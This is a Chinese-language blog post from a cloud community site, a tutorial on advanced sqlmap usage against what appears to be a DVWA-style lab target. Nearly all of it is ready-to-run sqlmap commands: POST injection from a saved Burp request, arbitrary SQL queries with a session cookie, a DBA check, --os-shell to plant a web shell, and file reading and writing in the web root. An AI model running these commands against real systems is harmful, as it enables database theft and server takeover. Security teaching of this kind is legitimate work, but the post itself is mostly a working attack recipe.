【愚公系列】2022年03月 Web渗透测试之sqlmap的高级用法

举报
愚公搬代码 发表于 2022/03/31 23:41:15 2022/03/31
【摘要】 一:post注入1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.注入方式1.sqlmap.py -r c:\1.txt-p username -D mysql --tables2.sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms3.sqlmap -u http://xx...

一:post注入

1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下
在这里插入图片描述

2.注入方式

1.sqlmap.py -r c:\1.txt-p username -D mysql --tables
2.sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms
3.sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"

二:辅助手工注入

sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --sql-query "select user(),version(),database()" 

其他sql语法类似

三:交互式写shell

//判断是否为dba用户
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --is-dba
//写入shell
sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --os-shell

写入shell后会给出路径:http://10.1.1.136/vulnerabilities/exec/tmpujhum.php
根据路径访问上传木马文件。

四:文件读写

读取文件:

sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" -——cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --file-read=/opt/lampp/htdocs/php.ini

写入文件:

sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --file-write C:\1.txt --file-dest /opt/lampp/htdocs/vulnerabilities/exec/1.txt
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。